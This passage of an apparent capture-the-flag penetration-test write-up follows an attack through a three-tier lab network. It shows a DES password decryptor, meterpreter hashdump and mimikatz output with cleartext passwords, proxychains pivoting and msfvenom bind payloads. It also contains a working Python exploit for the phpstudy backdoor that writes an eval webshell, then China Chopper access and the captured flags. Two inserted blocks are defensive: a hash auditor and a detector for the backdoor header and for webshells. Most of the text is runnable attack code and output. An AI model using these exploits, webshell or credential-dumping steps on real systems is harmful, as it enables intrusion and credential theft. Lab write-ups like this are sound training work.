                array[i] = (byte)num;
            }
            dESCryptoServiceProvider.Key = Encoding.ASCII.GetBytes(sKey);
            dESCryptoServiceProvider.IV = Encoding.ASCII.GetBytes(sKey);
            MemoryStream memoryStream = new MemoryStream();
            CryptoStream cryptoStream = new CryptoStream(memoryStream, dESCryptoServiceProvider.CreateDecryptor(), CryptoStreamMode.Write);
            cryptoStream.Write(array, 0, array.Length);
            cryptoStream.FlushFinalBlock();
            new StringBuilder();
            return Encoding.Default.GetString(memoryStream.ToArray());
        }

        private void button1_Click(object sender, EventArgs e)
        {
            string text1 = textBox1.Text.Trim(); // hex ciphertext
            string key = textBox2.Text.Trim();   // key
            textBox3.Text = Decrypt(text1, key); // plaintext
        }
    }
}
Decrypted (key: yx139222):
username  password                          plaintext
admin     AE5F6187F32825CA                  cc123
cc123     B97C57DB005F954242450A255217DA9F  qweasd123
6.4.2) mimikatz hash cracking
Check the interfaces
meterpreter > ifconfig

Interface  1
============
Name         : Software Loopback Interface 1
Hardware MAC : 00:00:00:00:00:00
MTU          : 4294967295
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff

Interface 11
============
Name         : Intel(R) PRO/1000 MT Network Connection
Hardware MAC : 00:0c:29:b3:2c:c4
MTU          : 1500
IPv4 Address : 192.168.0.134
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::29a6:8c8a:11:efec
IPv6 Netmask : ffff:ffff:ffff:ffff::

Interface 12
============
Name         : Microsoft ISATAP Adapter
Hardware MAC : 00:00:00:00:00:00
MTU          : 1280
IPv6 Address : fe80::5efe:a0a:a87
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff

Interface 13
============
Name         : Intel(R) PRO/1000 MT Network Connection #2
Hardware MAC : 00:0c:29:b3:2c:ce
MTU          : 1500
IPv4 Address : 10.10.10.135
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::a8c0:fbd9:becb:548f
IPv6 Netmask : ffff:ffff:ffff:ffff::

Interface 14
============
Name         : Microsoft ISATAP Adapter #2
Hardware MAC : 00:00:00:00:00:00
MTU          : 1280
IPv6 Address : fe80::5efe:c0a8:86
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff

Web server:
192.168.0.134
10.10.10.135
Use the run get_local_subnets command to check the routes
meterpreter > run get_local_subnets
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
Local subnet: 10.10.10.0/255.255.255.0
Local subnet: 192.168.0.0/255.255.255.0
When using mimikatz and similar hash-cracking tools, the process must be migrated first, otherwise they error out
Use ps to list the processes
meterpreter > ps
Use the migrate command to move into another process (preferably one running as SYSTEM; here PID 1560, vmtoolsd.exe running as NT AUTHORITY\SYSTEM in the process list)
meterpreter > migrate 1560
[*] Migrating from 2964 to 1560...
[*] Migration completed successfully.
Dump the hashes: run hashdump
meterpreter > run hashdump
[!] Meterpreter scripts are deprecated. Try post/windows/gather/smart_hashdump.
[!] Example: run post/windows/gather/smart_hashdump OPTION=value [...]
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 20401422a21274279449907862e9d520...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...

No users with password hints on this system

[*] Dumping password hashes...

Administrator:500:aad3b435b51404eeaad3b435b51404ee:1c933df09b600efabee0791aaccc43f2:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
MySQL_HWS:1001:aad3b435b51404eeaad3b435b51404ee:6a75a75e4cfd3cf00faf743e17e90a53:::
PhpMyAdmin_HWS:1002:aad3b435b51404eeaad3b435b51404ee:a14b615c584d6b043f42f1cfab9779cd:::
huweishen542147:1004:aad3b435b51404eeaad3b435b51404ee:c76eea2615348c5228f7027d3ccab02d:::
cc123:1005:aad3b435b51404eeaad3b435b51404ee:afdeb425b4a55982deb4e80fa3387576:::
newcc123:1007:aad3b435b51404eeaad3b435b51404ee:97824315153b4dd665d6c688f446ebf1:::
ww2cc123:1008:aad3b435b51404eeaad3b435b51404ee:adadf2dd832421c26a96705fd09a32bd:::
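A defender reviewing a SAM dump like the one above checks it for blank passwords, lingering LM hashes and passwords shared between accounts. This is an added example (not part of the original writeup) that parses the pwdump format and performs those three checks; the sample is constructed from four lines of the dump above plus one invented account, svc_backup, that shares cc123's NT hash. The two constants are the well-known values for "no LM hash stored" and the NT hash of an empty password; the dump does not show whether an account is enabled (Guest is disabled by default), so a blank hash is a finding to confirm against account status.

```python
from collections import defaultdict

# Well-known values: the LM field when no LM hash is stored, and the NT hash of
# an empty password.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# Constructed sample in pwdump format: four lines from the hashdump output above
# plus one invented account (svc_backup) that shares cc123's NT hash.
PWDUMP_SAMPLE = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:1c933df09b600efabee0791aaccc43f2:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
cc123:1005:aad3b435b51404eeaad3b435b51404ee:afdeb425b4a55982deb4e80fa3387576:::
newcc123:1007:aad3b435b51404eeaad3b435b51404ee:97824315153b4dd665d6c688f446ebf1:::
svc_backup:1010:aad3b435b51404eeaad3b435b51404ee:afdeb425b4a55982deb4e80fa3387576:::
"""


def parse_pwdump(text):
    """Parse 'user:rid:lm:nt:::' lines into dicts; malformed lines are skipped."""
    records = []
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            continue
        records.append({"user": parts[0], "rid": int(parts[1]),
                        "lm": parts[2].lower(), "nt": parts[3].lower()})
    return records


def blank_password_accounts(records):
    """Accounts whose NT hash is that of the empty password."""
    return [r["user"] for r in records if r["nt"] == EMPTY_NT]


def lm_hash_accounts(records):
    """Accounts still storing an LM hash (weak; should be disabled by policy)."""
    return [r["user"] for r in records if r["lm"] != EMPTY_LM]


def shared_password_groups(records):
    """Groups of accounts whose NT hashes are identical, i.e. same password."""
    by_hash = defaultdict(list)
    for r in records:
        if r["nt"] != EMPTY_NT:
            by_hash[r["nt"]].append(r["user"])
    return sorted(users for users in by_hash.values() if len(users) > 1)


def audit(text):
    """Run all three checks over a pwdump-format dump."""
    records = parse_pwdump(text)
    return {"accounts": len(records),
            "blank_password": blank_password_accounts(records),
            "lm_hash_present": lm_hash_accounts(records),
            "shared_password": shared_password_groups(records)}


if __name__ == "__main__":
    for key, value in audit(PWDUMP_SAMPLE).items():
        print(f"{key}: {value}")
```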
Load mimikatz with load mimikatz
mimikatz_command -f samdump::hashes
meterpreter > mimikatz_command -f samdump::hashes
Ordinateur : WIN-KALKEMT3JMA
BootKey : 20401422a21274279449907862e9d520

Rid : 500
User : Administrator
LM :
NTLM : 1c933df09b600efabee0791aaccc43f2

Rid : 501
User : Guest
LM :
NTLM :

Rid : 1001
User : MySQL_HWS
LM :
NTLM : 6a75a75e4cfd3cf00faf743e17e90a53

Rid : 1002
User : PhpMyAdmin_HWS
LM :
NTLM : a14b615c584d6b043f42f1cfab9779cd

Rid : 1004
User : huweishen542147
LM :
NTLM : c76eea2615348c5228f7027d3ccab02d

Rid : 1005
User : cc123
LM :
NTLM : afdeb425b4a55982deb4e80fa3387576

Rid : 1007
User : newcc123
LM :
NTLM : 97824315153b4dd665d6c688f446ebf1

Rid : 1008
User : ww2cc123
LM :
NTLM : adadf2dd832421c26a96705fd09a32bd
Search command: mimikatz_command -f sekurlsa::searchPasswords
meterpreter > mimikatz_command -f sekurlsa::searchPasswords
[0] { MySQL_HWS ; WIN-KALKEMT3JMA ; 5f00480068003800400069004f0077004000400054007300370059004b007100640057004a00320009ff57004a00320077006d005400610046002800 }
[1] { Administrator ; WIN-KALKEMT3JMA ; !@#Qwe123. }
[2] { newcc123 ; WIN-KALKEMT3JMA ; ZtKGmDj0qEbDECSBl5p }
[3] { cc123 ; WIN-KALKEMT3JMA ; Ht6_ifp6nvkjn }
[4] { newcc123 ; WIN-KALKEMT3JMA ; ZtKGmDj0qEbDECSBl5p }
[5] { WIN-KALKEMT3JMA ; Administrator ; !@#Qwe123. }
[6] { WIN-KALKEMT3JMA ; newcc123 ; ZtKGmDj0qEbDECSBl5p }
[7] { MySQL_HWS ; WIN-KALKEMT3JMA ; 5f00480068003800400069004f0077004000400054007300370059004b007100640057004a00320009ff57004a00320077006d005400610046002800 }
[8] { WIN-KALKEMT3JMA ; MySQL_HWS ; 5f00480068003800400069004f0077004000400054007300370059004b007100640057004a00320009ff57004a00320077006d005400610046002800 }
[9] { Administrator ; WIN-KALKEMT3JMA ; !@#Qwe123. }
[10] { WIN-KALKEMT3JMA ; cc123 ; Ht6_ifp6nvkjn }
[11] { cc123 ; WIN-KALKEMT3JMA ; Ht6_ifp6nvkjn }
Or use wdigest or tspkg (tidier listing)
meterpreter > wdigest
[+] Running as SYSTEM
[*] Retrieving wdigest credentials
wdigest credentials
===================

AuthID     Package    Domain           User             Password
------     -------    ------           ----             --------
0;545476 Negotiate IIS APPPOOL DefaultAppPool
0;996 Negotiate WORKGROUP WIN-KALKEMT3JMA$
0;2137231 Negotiate IIS APPPOOL cc123
0;1319987 Negotiate IIS APPPOOL ww2cc123
0;618915 Negotiate IIS APPPOOL newcc123
0;995 Negotiate NT AUTHORITY IUSR
0;997 Negotiate NT AUTHORITY LOCAL SERVICE
0;47995 NTLM
0;999 NTLM WORKGROUP WIN-KALKEMT3JMA$
0;325854 NTLM WIN-KALKEMT3JMA Administrator !@#Qwe123.
0;110599 NTLM WIN-KALKEMT3JMA MySQL_HWS 5f 00 48 00 68 00 38 00 40 00 69 00 4f 00 77 00 40 00 40 00 54 00 73 00 37 00 59 00 4b 00 71 00 64 00 57 00 4a 00 32 00 09 ff 57 00 4a 00 32 00 77 00 6d 00 54 00 61 00 46 00 28 00
0;2142507 NTLM WIN-KALKEMT3JMA cc123 Ht6_ifp6nvkjn
0;623301 NTLM WIN-KALKEMT3JMA newcc123 ZtKGmDj0qEbDECSBl5p
meterpreter > tspkg
[+] Running as SYSTEM
[*] Retrieving tspkg credentials
tspkg credentials
=================

AuthID     Package    Domain           User             Password
------     -------    ------           ----             --------
0;545476 Negotiate IIS APPPOOL DefaultAppPool
0;996 Negotiate WORKGROUP WIN-KALKEMT3JMA$
0;2137231 Negotiate IIS APPPOOL cc123
0;1319987 Negotiate IIS APPPOOL ww2cc123
0;618915 Negotiate IIS APPPOOL newcc123
0;995 Negotiate NT AUTHORITY IUSR
0;997 Negotiate NT AUTHORITY LOCAL SERVICE
0;47995 NTLM
0;999 NTLM WORKGROUP WIN-KALKEMT3JMA$
0;325854 NTLM WIN-KALKEMT3JMA Administrator !@#Qwe123.
0;110599 NTLM WIN-KALKEMT3JMA MySQL_HWS 5f 00 48 00 68 00 38 00 40 00 69 00 4f 00 77 00 40 00 40 00 54 00 73 00 37 00 59 00 4b 00 71 00 64 00 57 00 4a 00 32 00 09 ff 57 00 4a 00 32 00 77 00 6d 00 54 00 61 00 46 00 28 00
0;2142507 NTLM WIN-KALKEMT3JMA cc123 Ht6_ifp6nvkjn
0;623301 NTLM WIN-KALKEMT3JMA newcc123 ZtKGmDj0qEbDECSBl5p
Obtained the administrator account and password
Administrator !@#Qwe123.
II. Internal network penetration
1. Database server
1) Add route and proxy
Web server:
192.168.0.134
10.10.10.135
Add a route
run autoroute -s 10.10.10.0/24
Check the routes
run autoroute -p
Use the auxiliary/server/socks4a proxy module
msf5 exploit(windows/local/ms16_075_reflection_juicy) > use auxiliary/server/socks4a
msf5 auxiliary(server/socks4a) > options

Module options (auxiliary/server/socks4a):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The address to listen on
   SRVPORT  1080             yes       The port to listen on.

Auxiliary action:

   Name   Description
   ----   -----------
   Proxy

msf5 auxiliary(server/socks4a) > set SRVPORT 2222
SRVPORT => 2222
msf5 auxiliary(server/socks4a) > run
[*] Auxiliary module running as background job 0.
[*] Starting the socks4a proxy server
Edit the proxychains configuration file to point it at the socks4a port
Use proxychains and nmap to scan the internal network
proxychains nmap -sT -Pn 10.10.10.0/24
//scan the subnet
proxychains nmap -sT -Pn 10.10.10.136
//scan a single IP
The earlier os-shell cookie had expired
Obtain a new cookie
Fill in the new cookie to get the shell back
2) Bind connection into the 10.10.10.0/24 segment
Generate a bind payload
msfvenom -p windows/meterpreter/bind_tcp LPORT=13777 -f exe > bind.exe
Use the earlier large webshell, connected to the database, to upload the file
Run the file
Set up the listener and connect out to the remote host to establish the session (only a bind connection works; a reverse shell cannot come back because the host cannot reach us, unless a tunnel is built)
rhost is the remote server's IP, lport is the listening port
msf5 auxiliary(server/socks4a) > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf5 exploit(multi/handler) > options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Payload options (windows/meterpreter/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LPORT     12345            yes       The listen port
   RHOST                      no        The target address

Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

msf5 exploit(multi/handler) > set rhost 10.10.10.136
rhost => 10.10.10.136
msf5 exploit(multi/handler) > set lport 13777
lport => 13777
msf5 exploit(multi/handler) > run
[*] Started bind TCP handler against 10.10.10.136:13777
[*] Sending stage (176195 bytes) to 10.10.10.136
[*] Meterpreter session 3 opened (10.10.10.135:51227 -> 10.10.10.136:13777) at 2021-07-20 05:50:36 -0400
Connection succeeded; the session already runs as SYSTEM
View the network interface information
Database server
10.10.10.136
10.10.1.128
3) Crack the hashes
Migrate the process
Load mimikatz
Dump hashes: run hashdump
Dump hashes: mimikatz_command -f samdump::hashes
Get passwords: mimikatz_command -f sekurlsa::searchPasswords
[0] { Administrator ; WIN-JJU7KU45PN7 ; !@#QWEasd123. }
[1] { WIN-JJU7KU45PN7 ; Administrator ; !@#QWEasd123. }
[2] { Administrator ; WIN-JJU7KU45PN7 ; !@#QWEasd123. }
Enter a shell
Check the database server's hostname: hostname
Get the routes: run get_local_subnets
2. Target host
1) Set up a route and pivot into the internal network
Database server
10.10.10.136
10.10.1.128
In the database server session, add the route and proxy: run autoroute -s 10.10.1.0/24
2) Scan the internal network with proxychains
Scan the target host: proxychains nmap -sT -Pn 10.10.1.129
To scan the whole subnet: proxychains nmap -sT -Pn 10.10.1.0/24
Use proxychains to access 10.10.1.129:80
Command: proxychains firefox http://10.10.1.129
or proxychains3 firefox http://10.10.1.129
The target host is found to be running phpstudy
3) Exploit the relevant vulnerability
Search Baidu for known exploitation of this software
phpstudy 2014/2016/2018 (php 5.2.17/5.4.45) generally contains a backdoor
3.1) Write an exploitation tool
PHP syntax:
system('whoami')
eval(system('whoami'));
Tool code:
import requests
import sys
import base64
# import the modules

shell = "system('" + sys.argv[1] + "');"
# shell takes the first command-line argument; argv[0] is the script name
shell_base64 = base64.b64encode(shell.encode('utf-8'))
# encode shell as UTF-8 first, then base64-encode it
header = {'Accept-Charset': shell_base64, 'Accept-Encoding': 'gzip,deflate'}
# the 'Accept-Charset' request header is what carries the command here

def exploit(url):
    html = requests.get(url=url, headers=header).text
    # send the request and store the response body as text in html
    return url
    # return the url

url = 'http://10.10.1.129/'
# set the target site
print(exploit(url))
# call the function and print its return value, the url
Commands run through phpstudy's directory execute with SYSTEM privileges by default
3.2) Use the tool to write a webshell
Webshell write command: echo ^<?php @eval(\$_POST[\"shell\"])?^>>c:\phpstudy\WWW\shell.php
Run the script:
proxychains python3 phpstudy.py "echo ^<?php @eval(\$_POST[\"shell\"])?^>>c:\phpstudy\WWW\shell.php"
//proxychains routes through the proxy; python3 selects the interpreter; then the script; the quotes make the whole command a single argument
Created successfully
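Both steps above leave artifacts a defender can look for: the tool in 3.1 carries base64-encoded PHP in an Accept-Charset (or Accept-Encoding) request header, values that in legitimate traffic are short charset or encoding tokens and never decode to PHP, and 3.2 drops a one-line webshell of the form `<?php @eval($_POST["shell"])?>` into the web root. The checks below are an added example, not code from the original write-up or from phpstudy: one decodes watched headers and reports PHP execution tokens, the other scans PHP source (or a whole web root) for the common one-liner patterns. The sample request headers and PHP snippets are constructed; the header names are the ones the page's tool uses.

```python
"""Detect the two artifacts of the phpstudy backdoor chain described above.

Added example, not from the original write-up. Sample inputs are constructed.
"""
import base64
import os
import re

# Headers the backdoor tool abuses (compared case-insensitively)
WATCHED_HEADERS = ("accept-charset", "accept-encoding")
# Fragments that mark decoded header content as PHP code rather than a charset name
PHP_EXEC_TOKENS = ("<?php", "system(", "eval(", "shell_exec(", "passthru(", "exec(")

# One-line webshell constructs: user input fed straight into eval/exec functions
WEBSHELL_PATTERNS = [
    re.compile(r"@?\s*eval\s*\(\s*\$_(?:POST|GET|REQUEST|COOKIE)\s*\[", re.I),
    re.compile(r"\b(?:system|shell_exec|passthru|exec|assert)\s*\(\s*\$_(?:POST|GET|REQUEST|COOKIE)\s*\[", re.I),
    re.compile(r"\b(?:system|shell_exec|passthru|exec|eval)\s*\(\s*base64_decode\s*\(", re.I),
]

# Constructed samples: the first mirrors the page's tool called with "whoami",
# the second is an ordinary browser request.
SAMPLE_BACKDOOR_REQUEST = {
    "Accept-Charset": base64.b64encode(b"system('whoami');").decode("ascii"),
    "Accept-Encoding": "gzip,deflate",
}
SAMPLE_NORMAL_REQUEST = {
    "Accept-Charset": "utf-8, iso-8859-1;q=0.5",
    "Accept-Encoding": "gzip, deflate, br",
}
SAMPLE_WEBSHELL = '<?php @eval($_POST["shell"])?>'
SAMPLE_BENIGN_PHP = '<?php echo htmlspecialchars($_POST["name"]); ?>'


def decode_header_payload(headers):
    """Return a finding dict if a watched header holds base64-encoded PHP, else None."""
    lowered = {k.lower(): v for k, v in headers.items()}
    for name in WATCHED_HEADERS:
        value = lowered.get(name, "")
        try:
            # validate=True rejects commas, spaces, '-' and bad padding, so
            # "utf-8" or "gzip, deflate" never get this far; "gzip" alone is
            # valid base64 but decodes to bytes that are not UTF-8 text.
            text = base64.b64decode(value, validate=True).decode("utf-8")
        except ValueError:  # covers binascii.Error and UnicodeDecodeError
            continue
        hits = [tok for tok in PHP_EXEC_TOKENS if tok in text]
        if hits:
            return {"header": name, "decoded": text, "tokens": hits}
    return None


def scan_php_source(src):
    """Return the matched fragments of known webshell constructs in PHP source."""
    hits = []
    for pattern in WEBSHELL_PATTERNS:
        match = pattern.search(src)
        if match:
            hits.append(match.group(0))
    return hits


def scan_webroot(root):
    """Walk a web root and map each PHP file with webshell hits to its fragments."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith((".php", ".phtml", ".php5")):
                path = os.path.join(dirpath, name)
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    hits = scan_php_source(fh.read())
                if hits:
                    findings[path] = hits
    return findings


if __name__ == "__main__":
    print(decode_header_payload(SAMPLE_BACKDOOR_REQUEST))
    print(decode_header_payload(SAMPLE_NORMAL_REQUEST))
    print(scan_php_source(SAMPLE_WEBSHELL), scan_php_source(SAMPLE_BENIGN_PHP))
```

Run `decode_header_payload` over parsed access or reverse-proxy logs that retain request headers, and `scan_webroot` against the directory that phpstudy serves (c:\phpstudy\WWW on the page); the file scanner is deliberately pattern-based, so treat a hit as something to read, not as proof by itself.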
3.3) Set up a proxy and connect to the webshell with China Chopper (菜刀)
Download and install SocksCap
Use SocksCap to reach the third network tier
To use the proxy running in Kali from the physical host, proxychains.conf should use the local (Kali) IP rather than 127.0.0.1
Right-click to add a new proxy and configure the (Kali) IP, port, protocol, etc.
Run the connection test
Pitfall 4: although it reports a data-receive error, Chopper can still connect to the webshell normally
Drag the exe into the applications pane
Right-click it and choose "run the selected program in the proxy tunnel"
Then connect to the webshell with Chopper
Check the privileges in the virtual terminal: already SYSTEM
4) Establish a session in msf
Upload bind.exe (the bind_tcp payload) with Chopper
Run bind.exe
Method 1: Chopper's virtual terminal
Method 2: use phpstudy.py (the phpstudy backdoor exploitation script written above)
proxychains python3 phpstudy.py c:/bind.exe
Use the handler module again, reset the bind target host (RHOST), and connect forward
msf5 exploit(multi/handler) > options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Payload options (windows/meterpreter/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LPORT     13777            yes       The listen port
   RHOST     10.10.10.136     no        The target address

Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

msf5 exploit(multi/handler) > set rhost 10.10.1.129
rhost => 10.10.1.129
msf5 exploit(multi/handler) > run
[*] Started bind TCP handler against 10.10.1.129:13777
[*] Sending stage (176195 bytes) to 10.10.1.129
[*] Meterpreter session 4 opened (10.10.1.128:50355 -> 10.10.1.129:13777) at 2021-07-23 11:10:32 -0400
meterpreter >
Success
Enter a shell: shell
Check whether there are other hosts on the same subnet: arp -a
and the system information: systeminfo
etc.
C:\Windows\system32>arp -a

接口: 10.10.1.129 --- 0xb
  Internet 地址         物理地址              类型
  10.10.1.1             00-50-56-c0-00-03     动态
  10.10.1.128           00-0c-29-43-9b-50     动态
  10.10.1.254           00-50-56-e7-11-7f     动态
  10.10.1.255           ff-ff-ff-ff-ff-ff     静态
  224.0.0.22            01-00-5e-00-00-16     静态
  224.0.0.252           01-00-5e-00-00-fc     静态
  255.255.255.255       ff-ff-ff-ff-ff-ff     静态
5) Crack the hashes
Migrate the process and load mimikatz
hashdump
mimikatz_command -f samdump::hashes
mimikatz_command -f sekurlsa::searchPasswords
meterpreter > mimikatz_command -f sekurlsa::searchPasswords
[0] { Administrator ; TARGET ; !@#QWEasd123. }
[1] { TARGET ; Administrator ; !@#QWEasd123. }
[2] { Administrator ; TARGET ; !@#QWEasd123. }
wdigest and tspkg
III. The four flags
Session  Privileges
1        IIS APPPOOL\newcc123
2        NT AUTHORITY\SYSTEM
3        NT AUTHORITY\SYSTEM
4        NT AUTHORITY\SYSTEM
1. First flag
In the first network tier (web server)
Location:
C:/HwsHostMaster/wwwroot/ww2cc123_55m39g/web/upimg/flag.txt
flag1
eeac7f42e6fe8b0bf424734bb7d3c05d//moon1
2. Second flag
In the first network tier (it is in the administrator's directory, so privilege escalation is required first)
Location:
C:/Users/Administrator/flag2.txt
a81c3d94aa192d3f87ed9f2fffec04fc
//moonsec
3. Third flag
In the second network tier (database server)
Location:
C:/Users/Administrator/root.txt.txt
6d4db5ff0c117864a02827bad3c361b9
//moon
4. Fourth flag
In the third network tier (target host)
Location:
C:/Users/Administrator/root.txt.txt
63a9f0ea7bb98050796b649e85481845
//root